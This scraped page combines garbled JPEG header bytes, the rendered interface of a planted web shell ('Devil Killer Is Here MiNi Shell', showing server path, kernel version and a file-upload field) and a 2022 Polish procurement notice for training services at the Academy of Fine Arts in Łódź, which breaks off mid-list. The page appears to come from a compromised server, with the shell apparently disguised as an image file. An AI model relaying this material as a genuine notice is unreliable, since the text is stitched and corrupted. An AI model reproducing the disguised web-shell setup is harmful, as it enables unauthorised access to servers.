JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20220808/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20220808/0029648101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> WYKONANIE USŁUGI SZKOLENIOWEJ DLA AKADEMII SZTUK PIĘKNYCH IM. WŁADYSŁAWA STRZEMIŃSKIEGO W ŁODZI </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Akademia Sztuk Pięknych im. Władysława Strzemińskiego w Łodzi</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000275790</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wojska Polskiego 121</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łódź</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">91-726</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL711 - Miasto Łódź</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@asp.lodz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.asp.lodz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> WYKONANIE USŁUGI SZKOLENIOWEJ DLA AKADEMII SZTUK PIĘKNYCH IM. WŁADYSŁAWA STRZEMIŃSKIEGO W ŁODZI </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b101ec69-1702-11ed-acbd-46d0480cd9c4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00296481</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-08-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt „Zintegrowany Program ASP w Łodzi” współfinansowany ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Wiedza Edukacja Rozwój Oś III Szkolnictwo wyższe dla gospodarki i rozwoju, Działanie 3.5 Kompleksowe programy szkół wyższych. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/asp.lodz <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem platformy zakupowej pod adresem Platformazakupowa.pl zwanej dalej Platformą. Instrukcja korzystania z systemu dostępna jest pod adresem https://platformazakupowa.pl/strona/45-instrukcje<br/>b. Uwaga! Przed przystąpieniem do składania oferty, wykonawca jest zobowiązany zapoznać się z Instrukcją korzystania z Platformy zakupowej, dostępnej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest w języku polskim w formie elektronicznej a komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną za pośrednictwem platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/asp.lodz. W celu skrócenia czasu udzielenia odpowiedzi na pytania preferuje się, aby komunikacja między<br/>zamawiającym a wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane były za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do zamawiającego”.<br/>Oferta powinna być:<br/>a) sporządzona na podstawie załączników niniejszej SWZ w języku polskim,<br/>b) złożona przy użyciu środków komunikacji elektronicznej tzn. za pośrednictwem platformazakupowa.pl<br/>c) podpisana kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym przez osobę/osoby upoważnioną/upoważnione do reprezentowania wykonawcy<br/>d) Podpisy kwalifikowane wykorzystywane przez wykonawców do podpisywania wszelkich plików muszą spełniać “Rozporządzenie Parlamentu Europejskiego i Rady w sprawie identyfikacji elektronicznej i usług zaufania w odniesieniu do transakcji elektronicznych na rynku wewnętrznym<br/>(eIDAS) (UE) nr 910/2014 - od 1 lipca 2016 roku”.<br/>e) W przypadku wykorzystania formatu podpisu XAdES zewnętrzny Zamawiający wymaga dołączenia odpowiedniej ilości plików tj. podpisywanych plików z danymi oraz plików XAdES.<br/>f) Zgodnie z art. 18 ust. 3 ustawy Pzp, nie ujawnia się informacji stanowiących tajemnicę przedsiębiorstwa, w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji. Jeżeli wykonawca, nie później niż w terminie składania ofert, w sposób niebudzący wątpliwości zastrzegł, że nie mogą być one udostępniane oraz wykazał, załączając stosowne wyjaśnienia, iż zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa. Na platformie w formularzu składania oferty znajduje się miejsce wyznaczone do dołączenia części oferty stanowiącej tajemnicę przedsiębiorstwa.<br/>g) Wykonawca, za pośrednictwem platformazakupowa.pl może przed upływem terminu do składania ofert zmienić lub wycofać ofertę. Sposób dokonywania zmiany lub wycofania oferty zamieszczono w instrukcji zamieszczonej na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje<br/>h) Każdy z wykonawców może złożyć tylko jedną ofertę. Złożenie większej liczby ofert lub oferty zawierającej propozycje wariantowe podlegać będzie odrzuceniu.<br/>i) Ceny oferty muszą zawierać wszystkie koszty, jakie musi ponieść wykonawca aby zrealizować zamówienie z najwyższą starannością oraz ewentualne rabaty.<br/>j) Dokumenty i oświadczenia składane przez wykonawcę powinny być w języku polskim. <br/>k) Zgodnie z definicją dokumentu elektronicznego z art. 3 ust 2 Ustawy o informatyzacji działalności podmiotów realizujących zadania publiczne, opatrzenie pliku zawierającego skompresowane dane kwalifikowanym podpisem elektronicznym jest jednoznaczne z podpisaniem oryginału dokumentu, z wyjątkiem kopii poświadczonych odpowiednio przez innego wykonawcę ubiegającego się wspólnie z nim o udzielenie zamówienia, przez podmiot, na którego zdolnościach lub sytuacji polega wykonawca, albo przez podwykonawcę.<br/>l) Maksymalny rozmiar jednego pliku przesyłanego za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty wynosi 150 MB natomiast przy komunikacji wielkość pliku to maksymalnie 500 MB.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/> administratorem Pani/Pana danych osobowych jest Akademia Sztuk Pięknych im. Władysława Strzemińskiego w Łodzi, ul. Wojska Polskiego 121, 91-726 Łódź, tel.: 42/2547400, ;<br/> Kontakt w sprawie przetwarzania danych osobowych : iodo@asp.lodz.pl.<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO<br/>w celu związanym z niniejszym postępowaniem o udzielenie zamówienia prowadzonym w trybie podstawowym na podstawie art. 275 ust. 1 ustawy Prawo zamówień publicznych.<br/> odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu<br/>o art. 18 oraz art. 74 ustawy z dnia 11 września 2019r. – Prawo zamówień publicznych (tj. Dz. U. z 2021r. poz 1129 ze zm.), dalej „ustawa Pzp”;<br/> Pani/Pana dane osobowe będą przetwarzane zgodnie z obowiązującymi przepisami prawa, w tym ustawy Prawo zamówień publicznych i ustawy o rachunkowości,<br/>a następnie archiwizowane zgodnie z Jednolitym rzeczowym wykazem akt ASP w Łodzi;<br/> obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/> w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/> posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/> nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">KBZ.261.32.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">6</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Uznawalność zagranicznych dokumentów o wykształceniu do celów dalszego kształcenia w Polsce<br/><br/>PROPONOWANE ZAGADNIENIA <br/>1.	Obowiązujące akty prawne dotyczące uznawania zagranicznych dokumentów o wykształceniu. <br/>2.	Umowy międzynarodowe: <br/>1)	aktualnie obowiązujące,<br/>2)	wypowiedziane,<br/>3)	zakres obowiązywania,<br/>4)	wyjątki.<br/>3.	Świadectwa ukończenia szkoły średniej:<br/>1)	uznanie z mocy prawa,<br/>2)	uznanie w drodze decyzji administracyjnej.<br/>4.	Dyplomy ukończenia studiów:<br/>1)	uznanie z mocy prawa,<br/>2)	nostryfikacja.<br/>5.	Ocena dokumentów o wykształceniu:<br/>1)	dokumenty potwierdzające wykształcenie,<br/>2)	akredytacja a uznanie dyplomu,<br/>3)	dokumenty niemające odpowiedników w Polsce – brak możliwości uznania,<br/>4)	legalizacja/apostille,<br/>5)	tłumaczenia dokumentów w procedurze uznania wykształcenia,<br/>6)	weryfikacja dokumentów – zasady i dobre praktyki,<br/>7)	źródła informacji – przydatne linki.<br/>8) Podsumowanie szkolenia i konsultacje.<br/><br/>Tryb szkolenia: szkolenie zewnętrzne, stacjonarne, otwarte przy uczestnictwie szkolących się z innych uczelni wyższych<br/>Okres szkolenia: szkolenie 1 dniowe <br/>Ilość uczestników szkolenia: 2 osoby <br/>Termin szkolenia: IX 2022 – VI 2023 r. <br/>Szkolenie w formie wykładowo-warsztatowej, przy użyciu prezentacji multimedialnej, <br/>z interaktywnym udziałem uczestników szkolenia, polegającym na udziale w dyskusji <br/>z trenerem, analizie codziennych przypadków, wymianie doświadczeń wynikających z praktyki związanej z tematem szkolenia. Podczas szkolenia musi istnieć możliwość zadawania pytań prowadzącemu. <br/>Trener musi posiadać doświadczenie w prowadzeniu szkoleń dla uczelni wyższych. <br/>W cenę szkolenia Wykonawca powinien wliczyć materiały szkoleniowe w formie wydruku lub materiałów w wersji cyfrowej, które zostaną przekazane uczestnikom szkolenia podczas zajęć.<br/>Wykonawca jest zobowiązany do przeprowadzenia testu przed szkoleniem sprawdzającego wiedzę słuchaczy oraz testu na zakończenie szkolenia, sprawdzającego progres wiedzy słuchaczy po ukończeniu szkolenia – wymóg z uwagi na fakt że szkolenie przeprowadzane jest w ramach projektu pn. „Zintegrowany program ASP w Łodzi 2” w ramach POWER Działanie 3.5. Kompleksowe programy szkół wyższych.<br/>Uczestnicy otrzymują Certyfikat Ukończenia Szkolenia w języku polskim, potwierdzający odbycie szkolenia. <br/>Testy, materiały szkoleniowe oraz certyfikaty powinny zostać oznaczone informacją <br/>o współfinansowaniu przez Unię Europejską z Europejskiego Funduszu Społecznego, które Wykonawca otrzyma od Zlecającego. <br/>W cenie szkolenia wykonawca zapewnia przerwy kawowe oraz lunch. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby wyznaczonej do realizacji zamówienia - waga kryterium</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> - Regulamin studiów wyższych – wymogi formalne i aspekty praktyczne<br/>PROPONOWANE NAJWAŻNIEJSZE ZAGADNIENIA <br/>•	wybrane przepisy ustawy Prawo o szkolnictwie wyższym i nauce,<br/>•	wybrane przepisy rozporządzenia Ministra Nauki i Szkolnictwa Wyższego w sprawie studiów,<br/>•	wybrane przepisy wprowadzające ustawę – Prawo o szkolnictwie wyższym i nauce,<br/>•	wybrane przepisy rozporządzenia Prezesa Rady Ministrów w sprawie „Zasad techniki prawodawczej”<br/>Tryb szkolenia: szkolenie zewnętrzne, stacjonarne, otwarte przy uczestnictwie szkolących się z innych uczelni wyższych.<br/><br/> Okres szkolenia: szkolenie 1 dniowe <br/>Ilość uczestników szkolenia: 1 osoba <br/>Termin szkolenia: IX 2022 – VI 2023 r. <br/>Szkolenie w formie wykładowo-warsztatowej, przy użyciu prezentacji multimedialnej, <br/>z interaktywnym udziałem uczestników szkolenia, polegającym na udziale w dyskusji <br/>z trenerem, analizie codziennych przypadków, wymianie doświadczeń wynikających z praktyki związanej z tematem szkolenia. Podczas szkolenia musi istnieć możliwość zadawania pytań prowadzącemu. <br/>Trener musi posiadać doświadczenie w prowadzeniu szkoleń dla uczelni wyższych. <br/>W cenę szkolenia Wykonawca powinien wliczyć materiały szkoleniowe w formie wydruku lub materiałów w wersji cyfrowej, które zostaną przekazane uczestnikom szkolenia podczas zajęć.<br/>Wykonawca jest zobowiązany do przeprowadzenia testu przed szkoleniem sprawdzającego wiedzę słuchaczy oraz testu na zakończenie szkolenia, sprawdzającego progres wiedzy słuchaczy po ukończeniu szkolenia – wymóg z uwagi na fakt że szkolenie przeprowadzane jest w ramach projektu pn. „Zintegrowany program ASP w Łodzi 2” w ramach POWER Działanie 3.5. Kompleksowe programy szkół wyższych.<br/>Uczestnicy otrzymują Certyfikat Ukończenia Szkolenia w języku polskim, potwierdzający odbycie szkolenia. <br/>Testy, materiały szkoleniowe oraz certyfikaty powinny zostać oznaczone informacją <br/>o współfinansowaniu przez Unię Europejską z Europejskiego Funduszu Społecznego, które Wykonawca otrzyma od Zlecającego. <br/>W cenie szkolenia wykonawca zapewnia przerwy kawowe oraz lunch. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby wyznaczonej do realizacji zamówienia - waga kryterium</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Stosowanie przepisów kodeksu postępowania administracyjnego w uczelni w świetle najnowszych zmian<br/><br/>Szkolenie powinno uwzględniać w szczególności:<br/>	wybrane przepisy ustawy Prawo o szkolnictwie wyższym i nauce<br/>	wybrane przepisy Kodeksu postępowania administracyjnego ze szczególnym uwzględnieniem zmian wynikających z ustawy o doręczeniach elektronicznych<br/>	wybrane przepisy ustawy o świadczeniach rodzinnych<br/>Stosowanie przepisów kodeksu postępowania administracyjnego w uczelni w świetle najnowszych zmian<br/>1.	Wstęp<br/>2.	Ustawa z dnia 18 listopada 2020 r. o doręczeniach elektronicznych i wynikające z niej zmiany ustawy – Kodeks postępowania administracyjnego <br/>3.	Postępowania prowadzone przez organy uczelni w świetle ustawy 2.0. – decyzje administracyjne i inne rozstrzygnięcia<br/>4.	Wybrane instytucje postępowania administracyjnego z uwzględnieniem możliwości prowadzenia spraw elektronicznie:<br/>a)	wszczęcie postępowania<br/>b)	podania, wnioski, wezwania<br/>c)	terminy i doręczenia<br/>d)	postępowanie wyjaśniające<br/>5.	Decyzje i rozstrzygnięcia wydawane w indywidualnych sprawach studentów:<br/>a)	rekrutacja na studia<br/>b)	skreślenie z listy studentów<br/>c)	przeniesienie z innej uczelni<br/>d)	wznowienie studiów<br/>e)	zwolnienie z opłat za studia<br/>f)	sprawy stypendialne<br/>g)	stwierdzenie nieważności dyplomu<br/>h)	wznowienie postępowania w sprawie nadania tytułu zawodowego<br/>i)	rozstrzygnięcia związane z przebiegiem studiów<br/>6.	Postępowanie odwoławcze przed organami uczelni<br/>7.	